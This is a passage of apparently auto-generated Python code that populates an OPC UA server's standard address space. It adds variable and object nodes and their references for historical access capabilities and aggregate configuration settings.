ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11273, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11273, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11274, 0)
node.BrowseName = QualifiedName('MaxReturnEventValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnEventValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11274, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11274, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11196, 0)
node.BrowseName = QualifiedName('InsertDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11196, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11196, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11197, 0)
node.BrowseName = QualifiedName('ReplaceDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11198, 0)
node.BrowseName = QualifiedName('UpdateDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11199, 0)
node.BrowseName = QualifiedName('DeleteRawCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteRawCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11200, 0)
node.BrowseName = QualifiedName('DeleteAtTimeCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteAtTimeCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11281, 0)
node.BrowseName = QualifiedName('InsertEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11282, 0)
node.BrowseName = QualifiedName('ReplaceEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11283, 0)
node.BrowseName = QualifiedName('UpdateEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11502, 0)
node.BrowseName = QualifiedName('DeleteEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11502, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11502, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11275, 0)
node.BrowseName = QualifiedName('InsertAnnotationCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertAnnotationCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11275, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11275, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11201, 0)
node.BrowseName = QualifiedName('AggregateFunctions', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(61, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateFunctions")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11201, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(61, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11201, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11214, 0)
node.BrowseName = QualifiedName('Annotations', 0)
node.NodeClass = NodeClass.Variable
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Annotations")
attrs.DataType = NumericNodeId(891, 0)
attrs.ValueRank = -2
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11214, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2318, 0)
node.BrowseName = QualifiedName('HistoricalDataConfigurationType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(58, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("HistoricalDataConfigurationType")
attrs.IsAbstract = False
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11876, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2323, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2324, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2325, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2326, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2327, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2328, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11499, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11500, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(58, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3059, 0)
node.BrowseName = QualifiedName('AggregateConfiguration', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(11187, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateConfiguration")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11168, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11169, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11170, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11171, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11187, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11168, 0)
node.BrowseName = QualifiedName('TreatUncertainAsBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("TreatUncertainAsBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11168, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11168, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11168, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11169, 0)
node.BrowseName = QualifiedName('PercentDataBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11169, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11169, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11169, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11170, 0)
node.BrowseName = QualifiedName('PercentDataGood', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataGood")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11170, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11170, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11170, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11171, 0)
node.BrowseName = QualifiedName('UseSlopedExtrapolation', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UseSlopedExtrapolation")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11171, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11171, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11171, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11876, 0)
node.BrowseName = QualifiedName('AggregateFunctions', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(61, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateFunctions")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11876, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(61, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11876, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11876, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2323, 0)
node.BrowseName = QualifiedName('Stepped', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Stepped")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2323, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2323, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2323, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2324, 0)
node.BrowseName = QualifiedName('Definition', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Definition")
attrs.DataType = ua.NodeId(ua.ObjectIds.String)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2324, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2324, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
